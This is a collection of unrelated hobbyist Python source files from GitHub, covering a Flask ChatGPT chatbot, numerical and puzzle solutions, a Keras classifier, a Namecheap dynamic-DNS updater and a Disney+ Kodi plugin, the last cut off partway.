Modelling/PYMOO/pymoo_basics.py","file_name":"pymoo_basics.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23315162059","text":"\"\"\"\n// AI Chatbot\nChat with an intelligent bot using OpenAI ChatGPT API.\nUse voice or text to prompt and listen to the bot’s response.\n\n// TECHNOLOGIES\nBACKEND: Python - Flask - OpenAI ChatGPT API\nFRONTEND: JavaScript - HTML - CSS\n\n// DEV: Ali Jafarbeglou - since @ Oct 12, 2023\n\n\"\"\"\n\nfrom flask import Flask, render_template, request, session\nimport openai\n\n\n# Flask & OpenAPI Config Config\napp = Flask(__name__)\nAPI_KEY = open('API_KEY_.txt', 'r').read()\nopenai.api_key = API_KEY\n\napp.secret_key = 'secret_key'\nchat_log = []\n\n\n# Home Page\n@app.route('/', methods=['GET', 'POST'])\ndef home_page():\n session.setdefault('chat_log', []) # Initialize chat log in session\n return render_template('base.html')\n\n\n@app.route('/post_data', methods=['POST'])\ndef post_data():\n user_input = request.json\n session['chat_log'].append(f\"user: {user_input}\")\n\n try:\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=session['chat_log']\n )\n assistant_response = response['choices'][0]['message']['content'].strip()\n session['chat_log'].append(f\"assistant: {assistant_response}\")\n\n return assistant_response\n except openai.error.OpenAIError as e: # Generic OpenAI API error\n print(f\"Error: {e}\")\n return \"Sorry, there was an error processing your request.\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"zilogfa/ChatGPT-Prompt-Full-stack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18051464171","text":"from sys import stdin\nfrom collections import 
Counter\n\nlines = [line[:-1] for line in stdin]\n\ndef part1(lines):\n s = 0\n for line in lines:\n split = line.split(\" \")\n if len(set(split)) == len(split):\n s += 1\n return s\n\ndef part2(lines):\n s = 0\n for line in lines:\n split = line.split(\" \")\n c = Counter(\"\".join(sorted(w)) for w in split)\n if len(c) == len(split):\n s += 1\n return s\n\nprint(part1(lines))\nprint(part2(lines))\n","repo_name":"Ikerlb/aoc2017","sub_path":"4/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32395332340","text":"\"\"\"\nAuthor: ANTenna on 2021/12/27 11:34 上午\naliuyaohua@gmail.com\n\nDescription:\nload models, calculate diameter and save to file\n\"\"\"\n\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport open3d as o3d\n\nsys.path.insert(0, os.getcwd() + '/..')\nfrom utils.o3d_impl import get_aabb\n\n\ndef get_diameter(model_pcd):\n # get bbox\n # obb = model_pcd.get_oriented_bounding_box()\n aabb = get_aabb(model_pcd)\n diameter = np.linalg.norm([aabb[0], aabb[1]])\n return diameter\n\n\nif __name__ == '__main__':\n root_path = '/Users/aibee/Downloads/Dataset/3DDataset/6DPose/UWA'\n model_path = os.path.join(root_path, 'model')\n model_list = glob.glob(model_path + '/*.ply')\n\n diam_save_path = os.path.join(root_path, 'model', 'model_diameter.npy') # {model_name: diam}\n\n model_diameter = {}\n for model_file in model_list:\n model_name = os.path.basename(model_file).split('.')[0]\n # load model\n pcd = o3d.io.read_point_cloud(model_file)\n # pcd_np = np.array(pcd.points)\n\n # get diameter\n diam = get_diameter(pcd)\n model_diameter[model_name] = diam\n\n print('model: {} diam: {}'.format(model_name, diam))\n np.save(diam_save_path, model_diameter)\n","repo_name":"antenna-fast/PoseEstimation","sub_path":"metric/get_models_diameter.py","file_name":"get_models_diameter.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41213034022","text":"# Newton iteration for solution of the Burgers equation\n# -u_xx + beta u u_x - f = 0 , u(-1)=u(1)=0.\n#\n# The linear equation for the Newton step v will be\n#\n# -v_xx + beta u^(k) v_x + beta v u^(k)_x - u^(k)_xx + beta u^(k) u^(k)_x-f=0\n# J v + r = 0\n# J = (-K + beta*diag(u^(k))*D + beta*diag(u^(k)))\n# r = -K*u^(k) + beta*diag(u^(k) .* (D*u^(k))) - f\n\nimport numpy.linalg as npla\nimport scipy.sparse.linalg as spla\nimport numpy as np\nimport scipy.sparse as sp\nfrom FDLaplacian1D import FDLaplacian1D\nfrom FDCentralDiff1D import FDCentralDiff1D\n\n\nbeta = 100.0\n\n\n# Set up an m by m matrix for FD discretization of the Laplacian\nm = 10\nK = FDLaplacian1D(-1.0, 1.0, m)\nD = FDCentralDiff1D(-1.0, 1.0, m)\nf = np.ones(m)\n# Set initial guess\nu0 = 0.0*np.ones(m)\nr = -K*u0 + beta*np.multiply(u0, D*u0) - f\nnormR = npla.norm(r)\nnormR0 = normR\n\n# Newton iteration\ntol = 1.0e-14\nmaxIter = 20 # if it doesn't converge in a few iters, it probably won't ever\nconv = False\n\n# Newton iteration for K u = f(u)\nfor i in range(maxIter):\n print('newton iter=%6d rel resid=%12.5g' % (i, normR/normR0))\n # Form Jacobian\n J = -K + beta*sp.diags([D*u0],[0]) + beta*sp.diags([u0],[0])*D\n # We've computed residual already.\n\n # Step eqn is: J*v + r = 0\n newtStep = spla.spsolve(J, -r) # Solve for step\n\n # Update solution\n u0 = u0 + newtStep\n # Compute residual at new iterate\n r = -K*u0 + 
beta*np.multiply(u0, D*u0) - f\n normR = npla.norm(r) # Compute residual norm\n # Check for convergence: stop if either normR or normDelta is small enough\n if normR < tol*normR0:\n conv = True\n break\n\nif conv:\n print('Converged to solution u=', u0)\n print('Residual: absolute |r|=%12.5g, relative |r|=%12.5g'\n %(normR, (normR/normR0) ))\nelse:\n print('Failure to converge after %d iterations' % maxIter)\n","repo_name":"krlong014/PyNonlin","sub_path":"NewtonBurgers.py","file_name":"NewtonBurgers.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43173984795","text":"# 1 Create Node\r\n# 2 Create Linked list\r\n# 3 Add Nodes to Linked list\r\n# Print\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None \r\n \r\nclass Linkedlist:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insert(self, newNode): \r\n if self.head is None: # head=>One Piece->None \r\n self.head = newNode\r\n else:\r\n lastNode = self.head # head=>One Piece->JoyBoy->None || One Piece->Roger \r\n while True:\r\n if lastNode.next is None:\r\n break\r\n lastNode = lastNode.next\r\n lastNode.next = newNode\r\n\r\n def printList(self):\r\n # head=>One piece->JoyBoy->Roger->None \r\n if self.head is None:\r\n print(\"List in empty\") \r\n currentNode = self.head\r\n while True:\r\n if currentNode is None:\r\n break\r\n print(currentNode.data)\r\n currentNode = currentNode.next \r\n\r\n# Node => data, next\r\nfirstNode = Node(\"One Piece\")\r\nlinkedlist = Linkedlist()\r\n# linkedlist.insert(firstNode)\r\nsecondNode = Node(\"JoyBoy\")\r\n# linkedlist.insert(secondNode)\r\nthirdNode = Node(\"Roger\") \r\n# linkedlist.insert(thirdNode)\r\nlinkedlist.printList()\r\n\r\n","repo_name":"Rohit-155/Python","sub_path":"Data Structure & Algorithms/Linked-List.py","file_name":"Linked-List.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3256340536","text":"import cv2\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn.model_selection import train_test_split\nimport os\nfrom PIL import Image\nfrom matplotlib import pyplot as plt\n\nnum_classes = 3\ninput_shape = (32, 32, 1)\n# 0 = left, 1 = right\ndef load_data():\n train_data = []\n train_labels = []\n\n for file in os.listdir('hand-gesture-data/left'):\n img = Image.open(f'hand-gesture-data/left/{file}')\n img = img.resize((input_shape[0], input_shape[1]))\n img = np.asarray(img, dtype=np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n train_data.append(img / 255.0)\n train_labels.append(0)\n\n for file in os.listdir('hand-gesture-data/right'):\n img = Image.open(f'hand-gesture-data/right/{file}')\n img = img.resize((input_shape[0], input_shape[1]))\n img = np.asarray(img, dtype=np.float32)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n train_data.append(img / 255.0)\n train_labels.append(1)\n\n\n train_data = np.expand_dims(train_data, -1)\n train_labels = keras.utils.to_categorical(train_labels, num_classes)\n\n return train_data, train_labels\n\n\ndef main():\n train_x, train_y = load_data()\n batch_size = 128\n epochs = 15\n\n model = keras.Sequential(\n [\n keras.Input(shape=input_shape),\n layers.Dense(128, activation='relu'),\n layers.Dense(64, activation='relu'),\n layers.Flatten(),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation='softmax')\n ]\n )\n\n 
model.summary()\n model.compile(\n 'adam',\n loss='categorical_crossentropy',\n metrics=['accuracy']\n )\n\n model.fit(train_x, train_y, batch_size, epochs, validation_split=0.2)\n model.predict(train_x)\n model.save('./model.h5')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OlavAusland/AI","sub_path":"ML/Playground/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43073645111","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport os\nfrom ConfigParser import SafeConfigParser\n\nclass Propiedades:\n # variables de clase\n ficheroIni = \"config.ini\"\n bApt = False\n bGit = False\n bDocker = False\n\n def __init__(self):\n self.seccion = \"Config\"\n self.check_config_file()\n\n # Verifica si existe el fichero de configuración y si no existe lo crea\n def check_config_file(self):\n directory = os.getenv(\"HOME\")+'/.config/indicador-proxy'\n if not os.path.exists(directory):\n os.makedirs(directory)\n self.config_file = directory + '/' + self.ficheroIni\n if (not os.path.exists(self.config_file)):\n self.config = SafeConfigParser()\n self.config.read(self.config_file)\n self.config.add_section(self.seccion)\n self.config.set(self.seccion,\"proxy_apt\", \"False\")\n self.config.set(self.seccion,\"proxy_git\", \"False\")\n self.config.set(self.seccion,\"proxy_docker\", \"False\")\n with open(self.config_file, 'wb') as configfile:\n self.config.write(configfile)\n \n def lee(self, clave):\n self.config = SafeConfigParser()\n self.config.read(self.config_file)\n try:\n return self.config.get(self.seccion, clave )\n except:\n pass\n\n def escribe(self, clave, valor):\n self.config.set(self.seccion, clave, str(valor))\n with open(self.config_file, 'wb') as configfile:\n self.config.write(configfile)\n\n \n\n\n \n\n","repo_name":"fjcasti/oidpm","sub_path":"propiedades.py","file_name":"propiedades.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31099653530","text":"# -*- coding: utf-8 -*-\n\n# Can be solved by square of matrix in O(V³) time\n# i.e: edges of two-path size\n# and for each neighbor, check\n# if it has another neighbor\n# that connects to the first vertex\n\n# This solution does a square matrix\n# without actually storing it\n\n# Also, this not necessarily have to\n# be solved with a matrix. 
I think I could\n# have used an adjacent list and brute-force\n\n# runtime O(V³) (runtime required by the problem)\n# space O(V)\n\n\n# O(3*log3)\ndef canonical_triangle(p1, p2, p3):\n triangle = []\n for p in (p1, p2, p3):\n triangle.append(tuple(sorted(p)))\n return tuple(sorted(triangle))\n\n\ndef find_triangles(matrix, dim):\n triangles = set()\n for row in range(dim):\n for col in range(dim):\n if row == col: # avoid loop in first vertex (edge case)\n continue\n if matrix[row * dim + col] > 0: # first edge\n # row2 = col\n for col2 in range(dim):\n if col == col2 or col2 == row: # avoid loop in second and\n # third vertex (edge case)\n continue\n is_triangle = (\n matrix[col * dim + col2] > 0 # second edge\n and matrix[col2 * dim + row] > 0 # third edge\n )\n if is_triangle:\n triangles.add(canonical_triangle(\n (row, col), (col, col2), (col2, row))) # O(3*log3)\n return triangles\n\n\n# A\n# / | \\\n# / | \\\n# B C D\n# | | |\n# | | |\n# E---F---G\n# | |\n# ---------\n# (E, G) is also an edge\nm1 = [\n 1,1,1,1,0,0,0,\n 1,0,0,0,1,0,0,\n 1,0,0,0,0,1,0,\n 1,0,0,0,0,0,1,\n 0,1,0,0,0,1,1,\n 0,0,1,0,1,0,1,\n 0,0,0,1,1,1,0,\n]\n\nprint(find_triangles(m1, 7))\n# {((4, 5), (4, 6), (5, 6))}\n\n# shared edge, edge case\n# a -- b -- c\n# \\ | /\n# \\ | /\n# \\ | /\n# d\n\nm2 = [\n 0,1,0,1,\n 1,0,1,1,\n 0,1,0,1,\n 1,1,1,0,\n]\n\nprint(find_triangles(m2, 4))\n# {\n# ((0, 1), (0, 3), (1, 3)),\n# ((1, 2), (1, 3), (2, 3))\n# }\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_17_01_triangles_in_adj_matrix_graph.py","file_name":"05_17_01_triangles_in_adj_matrix_graph.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70279824487","text":"import random\nimport math\n\ndef veletlen(mettol, meddig, lepes=1):\n\tdarab=math.ceil((meddig-mettol)/lepes)\n\teltolas=mettol\n\tszam=math.floor(random.random()*darab)*lepes+eltolas\n\n\treturn szam\n\nprint(veletlen(10,20))\n\nszamok=[]\nfor i in range(100):\n\tszamok.append(veletlen(10,20))\t\nprint(szamok)\n\nszamok=[]\nb = veletlen(10,21)\nfor _ in range(b):\n\tb2=veletlen(10,21)\n\ttemp=[]\n\tfor _ in range(b2):\n\t\ttemp.append(veletlen(160,201))\n\tszamok.append(temp)\n\nprint(szamok)\n\n#szamok=[[veletlen(160,200) for _ in range(veletlen(10,21))] for _ in range(veletlen(10,21))]\nprint(szamok)\n","repo_name":"RTomi05/Pythonsuli","sub_path":"random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9445807198","text":"#!/usr/bin/env python3\n\nimport sys, json\n\nFEATURE_JOIN_STRING = \"+\"\nVALUE_JOIN_STRING = \"�\"\n\nfeatures_to_select = json.loads(\"\".join(sys.argv[1:]))\n\nfeatures = sys.stdin.readline().rstrip(\"\\n\")\nfeatures = list(filter(None, features.split(\"\\t\")))\n\nassert len(features) == len(set(features))\n\nfor feature in features_to_select:\n if isinstance(feature, str):\n feature = [feature]\n for sub_feature in feature:\n assert sub_feature in features, \"%s not in %s\" % (sub_feature, features)\n\nprint(\"\\t\" + \"\\t\".join(feature if isinstance(feature, str) else FEATURE_JOIN_STRING.join(feature) \\\n for feature in features_to_select))\n\nfor sample in sys.stdin:\n sample = sample.rstrip(\"\\n\")\n fields = list(filter(None, sample.split(\"\\t\")))\n label, values = fields[0], fields[1:]\n \n assert len(values) == len(features)\n values = dict(zip(features, 
values))\n \n sample_features = []\n for feature in features_to_select:\n if isinstance(feature, str):\n feature = [feature]\n sample_features.append(VALUE_JOIN_STRING.join(values[sub_feature] for sub_feature in feature))\n \n print(\"%s\\t%s\" % (label, \"\\t\".join(sample_features)))\n\n","repo_name":"michaelnmmeyer/bayes_fss","sub_path":"scripts/mksubset.py","file_name":"mksubset.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14807294621","text":"import random\n\nplayer = int(input(\"请输入你要出的拳,石头1/剪刀2/布3:\"))\ncomputer = random.randint(1,3)\nprint(\"玩家出的拳为 %d,电脑出的拳为 %d\" % (player,computer))\n\nif ((player == 1 and computer == 2)\n or (player == 2 and computer == 3)\n or (player == 3 and computer == 1)):\n print(\"电脑弱爆了!\")\nelif player == computer:\n print(\"平局,再来\")\nelse:\n print(\"我不服,再来\")\n","repo_name":"jimke0127/my_python","sub_path":"基础/mm_10_剪刀石头布.py","file_name":"mm_10_剪刀石头布.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72124591209","text":"\"\"\"\nContains Updater class' implementation\n\"\"\"\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom os import environ\nfrom pathlib import Path\nfrom time import sleep\nfrom typing import List\nfrom xml.etree import ElementTree as Et\n\nfrom requests import get, Response\n\nfrom namecheap.message import send_message\n\n\nclass Updater:\n \"\"\"\n Contains methods to generate a requests to update namecheap.com's\n DNS records for a list of sites\n \"\"\"\n\n def __init__(self, domains: List[str]) -> None:\n self.domains = domains\n self.logger = None\n self.ip = None\n\n def __str__(self) -> str:\n return f'Updater for: `{ \"` `\".join(self.domains)}`'\n\n @staticmethod\n def _verify_env() -> None:\n \"\"\"\n Verifies that the environmental variables used by this class are set\n :raises AttributeError\n \"\"\"\n for var in ['dyn-password', 'log_dir']:\n if environ.get(var) is None:\n raise AttributeError(f'Environmental variable `{var}` not set')\n\n @staticmethod\n def get_ip() -> str:\n \"\"\"\n Gets this computer's external IP address via api call to ipify.com\n \"\"\"\n resp = get('http://api.ipify.org')\n if resp.status_code == 200:\n return resp.text\n return ''\n\n def _logger_setup(self) -> None:\n \"\"\"\n Initiates logger\n \"\"\"\n self._verify_env() # Raises Attribute error if env vars not set\n log_dir = Path(environ['log_dir'])\n if not log_dir.exists():\n log_dir.mkdir()\n filename = Path.joinpath(log_dir, 'namecheap-updater.log')\n log = logging.getLogger('namecheap_updater')\n log.setLevel(logging.DEBUG)\n fmt = logging.Formatter(\"%(asctime)s [%(filename)s] func: [%(funcName)s] [%(levelname)s] \"\n \"line: [%(lineno)d] %(message)s\")\n file_handler = RotatingFileHandler(filename=filename,\n delay=True,\n backupCount=5,\n maxBytes=2000000)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(fmt)\n if not log.handlers:\n log.addHandler(file_handler)\n self.logger = log\n\n @staticmethod\n def _send_request(domain: str, ip: str) -> Response:\n \"\"\"\n Returns response to get request sent to the update URL\n :param domain: string of domain for which to request an update\n :param ip: string of new ip address\n \"\"\"\n update_url = f'https://dynamicdns.park-your-domain.com/update?' 
\\\n f'host=@&domain={domain}&password={environ[\"dyn-password\"]}&ip={ip}'\n return get(update_url)\n\n def run(self) -> None:\n \"\"\"\n Gets IP every 5min, if the IP is different than the original IP, sends request to namecheap's DynDNS systems\n to update DNS records correctly.\n \"\"\"\n self._logger_setup()\n for _ in range(3):\n ip = self.get_ip()\n if ip:\n self.ip = ip\n self.logger.info('IP fetched successfully')\n break\n else:\n self.logger.warning(f'IP fetch attempt unsuccessful, trying again in 2 seconds...')\n sleep(2)\n if not self.ip:\n raise AttributeError('Unable to fetch IP address')\n\n while True:\n old_ip = self.ip\n new_ip = self.get_ip()\n if old_ip != new_ip:\n successes = 0\n failures = []\n for domain in self.domains:\n resp = self._send_request(domain, new_ip)\n success = xml_errors(resp.text)\n if success:\n msg = f'IP address change for {domain} submitted to namecheap, ' \\\n 'change should be effective in 30 minutes.'\n self.logger.info(msg)\n successes += 1\n else:\n msg = f'IP address request failure, response: {resp.text}'\n failures.append(msg)\n self.logger.error(msg)\n if successes == len(self.domains):\n msg = f'IP address change for domains: {\" \".join(self.domains)}\\nsuccessful updated to {new_ip}.'\n send_message('Namecheap DynDNS IP address change successful', msg)\n self.ip = new_ip\n else:\n msg = f'Namecheap DynDNS IP address change failed!\\n' + \"\\n\".join(failures)\n send_message('Namecheap DynDNS IP address change Failure!', msg)\n else:\n self.logger.info('IP address same, sleeping')\n sleep(300)\n\n\ndef xml_errors(xml: str) -> bool:\n \"\"\"\n Parses XML, determines if the xml response contains errors.\n False if there are no errors, True if there are.\n :param xml: string, xml response returned from namecheap dns update request\n \"\"\"\n for child in Et.fromstring(xml):\n if child.tag == 'ErrCount':\n return not child.text == '0'\n","repo_name":"jakkso/namecheap_updater","sub_path":"namecheap/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13836368669","text":"from .config import *\nfrom .Vocabulary import Vocabulary\nfrom torch.nn.utils.rnn import pad_sequence\n\n\nclass CollateFn:\n \"\"\"\n Class to collate sample into batch with the same length (sentence length).\n \"\"\"\n\n def __init__(self):\n \"\"\"\n The class constructor.\n \"\"\"\n self.pad_index = PAD_IDX\n self.vocab = Vocabulary(freq_threshold=1)\n self.text_transform = self.vocab.preprocess()\n\n def __call__(self, batch):\n \"\"\"\n Allow the class to be called as function.\n :return: source, and target as batches.\n \"\"\"\n\n # Split the batch\n src_batch, tgt_batch = [], []\n\n for src_sample, tgt_sample in batch:\n src_batch.append(self.text_transform[SRC_LANGUAGE](src_sample.rstrip(\"\\n\")))\n tgt_batch.append(self.text_transform[TGT_LANGUAGE](tgt_sample.rstrip(\"\\n\")))\n\n src_batch = pad_sequence(src_batch, padding_value=self.pad_index)\n tgt_batch = pad_sequence(tgt_batch, padding_value=self.pad_index)\n\n return src_batch, tgt_batch\n","repo_name":"mhannani/zinvert","sub_path":"src/data/collate_fn.py","file_name":"collate_fn.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17575081418","text":"import sys\nimport random\nimport datetime\n\nimport arrow\nfrom kodi_six import xbmcplugin\n\nfrom slyguy import 
plugin, gui, userdata, signals, inputstream, settings\nfrom slyguy.log import log\nfrom slyguy.exceptions import PluginError\nfrom slyguy.constants import KODI_VERSION, ROUTE_RESUME_TAG\n\nfrom .api import API\nfrom .constants import *\nfrom .language import _\n\napi = API()\n\n@signals.on(signals.BEFORE_DISPATCH)\ndef before_dispatch():\n api.new_session()\n plugin.logged_in = api.logged_in\n\n@plugin.route('')\ndef index(**kwargs):\n folder = plugin.Folder(cacheToDisc=False)\n\n if not api.logged_in:\n folder.add_item(label=_(_.LOGIN, _bold=True), path=plugin.url_for(login), bookmark=False)\n else:\n folder.add_item(label=_(_.FEATURED, _bold=True), path=plugin.url_for(collection, slug='home', content_class='home', label=_.FEATURED))\n folder.add_item(label=_(_.HUBS, _bold=True), path=plugin.url_for(hubs))\n folder.add_item(label=_(_.MOVIES, _bold=True), path=plugin.url_for(collection, slug='movies', content_class='contentType'))\n folder.add_item(label=_(_.SERIES, _bold=True), path=plugin.url_for(collection, slug='series', content_class='contentType'))\n folder.add_item(label=_(_.ORIGINALS, _bold=True), path=plugin.url_for(collection, slug='originals', content_class='originals'))\n folder.add_item(label=_(_.WATCHLIST, _bold=True), path=plugin.url_for(collection, slug='watchlist', content_class='watchlist'))\n folder.add_item(label=_(_.SEARCH, _bold=True), path=plugin.url_for(search))\n\n if settings.getBool('disney_sync', False):\n folder.add_item(label=_(_.CONTINUE_WATCHING, _bold=True), path=plugin.url_for(sets, set_id=CONTINUE_WATCHING_SET_ID, set_type=CONTINUE_WATCHING_SET_TYPE))\n\n if settings.getBool('bookmarks', True):\n folder.add_item(label=_(_.BOOKMARKS, _bold=True), path=plugin.url_for(plugin.ROUTE_BOOKMARKS), bookmark=False)\n\n if not userdata.get('kid_lockdown', False):\n folder.add_item(label=_.SELECT_PROFILE, path=plugin.url_for(select_profile), art={'thumb': userdata.get('avatar')}, info={'plot': userdata.get('profile')}, _kiosk=False, bookmark=False)\n #folder.add_item(label=_.PROFILE_SETTINGS, path=plugin.url_for(profile_settings), art={'thumb': userdata.get('avatar')}, info={'plot': userdata.get('profile')}, _kiosk=False)\n\n folder.add_item(label=_.LOGOUT, path=plugin.url_for(logout), _kiosk=False, bookmark=False)\n\n folder.add_item(label=_.SETTINGS, path=plugin.url_for(plugin.ROUTE_SETTINGS), _kiosk=False, bookmark=False)\n\n return folder\n\n@plugin.route()\ndef login(**kwargs):\n username = gui.input(_.ASK_USERNAME, default=userdata.get('username', '')).strip()\n if not username:\n return\n\n userdata.set('username', username)\n\n password = gui.input(_.ASK_PASSWORD, hide_input=True).strip()\n if not password:\n return\n\n api.login(username, password)\n _select_profile()\n gui.refresh()\n\n@plugin.route()\ndef hubs(**kwargs):\n folder = plugin.Folder(_.HUBS)\n\n data = api.collection_by_slug('home', 'home')\n thumb = _image(data.get('images', []), 'thumb')\n\n for row in data['containers']:\n _set = row.get('set')\n if _set.get('contentClass') == 'brandSix':\n items = _process_rows(_set.get('items', []), 'brand')\n folder.add_items(items)\n\n return folder\n\n@plugin.route()\ndef edit_profile(key, value, **kwargs):\n profile = api.active_profile()\n\n if key == 'prefer_133':\n profile['attributes']['playbackSettings']['prefer133'] = bool(int(value))\n\n if api.update_profile(profile):\n gui.refresh()\n\n# @plugin.route()\n# def profile_settings(**kwargs):\n# folder = plugin.Folder(_.PROFILE_SETTINGS)\n\n# profile = api.active_profile()\n\n# app_language = 
profile['attributes']['languagePreferences']['appLanguage']\n# playback_language = profile['attributes']['languagePreferences']['playbackLanguage']\n# subtitle_language = profile['attributes']['languagePreferences']['subtitleLanguage']\n# prefer_133 = profile['attributes']['playbackSettings']['prefer133']\n\n# # folder.add_item(label='App Language: {}'.format(app_language))\n# # folder.add_item(label='Playback Language: {}'.format(playback_language))\n# # folder.add_item(label='Subtitle Language: {}'.format(subtitle_language))\n# folder.add_item(label='Prefer Original Video Format: {}'.format('Yes' if prefer_133 else 'No'), path=plugin.url_for(edit_profile, key='prefer_133', value=int(not prefer_133)))\n\n# return folder\n\n@plugin.route()\ndef select_profile(**kwargs):\n if userdata.get('kid_lockdown', False):\n return\n\n _select_profile()\n gui.refresh()\n\ndef _avatars(ids):\n avatars = {}\n\n data = api.avatar_by_id(ids)\n for row in data['avatars']:\n avatars[row['avatarId']] = row['images'][0]['url']\n\n return avatars\n\ndef _select_profile():\n profiles = api.profiles()\n active = api.active_profile()\n avatars = _avatars([x['attributes']['avatar']['id'] for x in profiles])\n\n options = []\n values = []\n can_delete = []\n default = -1\n\n for index, profile in enumerate(profiles):\n values.append(profile)\n profile['_avatar'] = avatars.get(profile['attributes']['avatar']['id'])\n\n if profile['attributes']['parentalControls']['isPinProtected']:\n label = _(_.PROFILE_WITH_PIN, name=profile['profileName'])\n else:\n label = profile['profileName']\n\n options.append(plugin.Item(label=label, art={'thumb': profile['_avatar']}))\n\n if profile['profileId'] == active.get('profileId'):\n default = index\n\n userdata.set('avatar', profile['_avatar'])\n userdata.set('profile', profile['profileName'])\n userdata.set('profile_id', profile['profileId'])\n\n elif not profile['attributes']['isDefault']:\n can_delete.append(profile)\n\n options.append(plugin.Item(label=_(_.ADD_PROFILE, _bold=True)))\n values.append('_add')\n\n if can_delete:\n options.append(plugin.Item(label=_(_.DELETE_PROFILE, _bold=True)))\n values.append('_delete')\n\n index = gui.select(_.SELECT_PROFILE, options=options, preselect=default, useDetails=True)\n\n if index < 0:\n return\n\n selected = values[index]\n\n if selected == '_delete':\n _delete_profile(can_delete)\n elif selected == '_add':\n _add_profile(taken_names=[x['profileName'] for x in profiles], taken_avatars=[avatars[x] for x in avatars])\n else:\n _set_profile(selected)\n\ndef _set_profile(profile):\n pin = None\n if profile['attributes']['parentalControls']['isPinProtected']:\n pin = gui.input(_.ENTER_PIN, hide_input=True).strip()\n\n api.set_profile(profile, pin=pin)\n\n if settings.getBool('kid_lockdown', False) and profile['attributes']['kidsModeEnabled']:\n userdata.set('kid_lockdown', True)\n\n userdata.set('avatar', profile['_avatar'])\n userdata.set('profile', profile['profileName'])\n userdata.set('profile_id', profile['profileId'])\n gui.notification(_.PROFILE_ACTIVATED, heading=profile['profileName'], icon=profile['_avatar'])\n\ndef _delete_profile(profiles):\n options = []\n for index, profile in enumerate(profiles):\n options.append(plugin.Item(label=profile['profileName'], art={'thumb': profile['_avatar']}))\n\n index = gui.select(_.SELECT_DELETE_PROFILE, options=options, useDetails=True)\n if index < 0:\n return\n\n selected = profiles[index]\n if gui.yes_no(_.DELETE_PROFILE_INFO, heading=_(_.DELTE_PROFILE_HEADER, 
name=selected['profileName'])) and api.delete_profile(selected).ok:\n gui.notification(_.PROFILE_DELETED, heading=selected['profileName'], icon=selected['_avatar'])\n\ndef _add_profile(taken_names, taken_avatars):\n ## PROFILE AVATAR ##\n options = [plugin.Item(label=_(_.RANDOM_AVATAR, _bold=True)),]\n values = ['_random',]\n avatars = {}\n unused = []\n\n data = api.collection_by_slug('avatars', 'avatars')\n for container in data['containers']:\n if container['set']['contentClass'] == 'hidden':\n continue\n\n category = _get_text(container['set']['texts'], 'title', 'set')\n\n for row in container['set'].get('items', []):\n if row['images'][0]['url'] in taken_avatars:\n label = _(_.AVATAR_USED, label=category)\n else:\n label = category\n unused.append(row['avatarId'])\n\n options.append(plugin.Item(label=label, art={'thumb': row['images'][0]['url']}))\n values.append(row['avatarId'])\n avatars[row['avatarId']] = row['images'][0]['url']\n\n index = gui.select(_.SELECT_AVATAR, options=options, useDetails=True)\n if index < 0:\n return\n\n avatar = values[index]\n if avatar == '_random':\n avatar = random.choice(unused or avatars.keys())\n\n ## PROFLE KIDS ##\n kids = gui.yes_no(_.KIDS_PROFILE_INFO, heading=_.KIDS_PROFILE)\n\n ## PROFILE NAME ##\n name = ''\n while True:\n name = gui.input(_.PROFILE_NAME, default=name).strip()\n if not name:\n return\n\n elif name in taken_names:\n gui.notification(_(_.PROFILE_NAME_TAKEN, name=name))\n\n else:\n break\n\n profile = api.add_profile(name, kids=kids, avatar=avatar)\n profile['_avatar'] = avatars[avatar]\n\n if 'errors' in profile:\n raise PluginError(profile['errors'][0].get('description'))\n\n _set_profile(profile)\n\n@plugin.route()\ndef collection(slug, content_class, label=None, 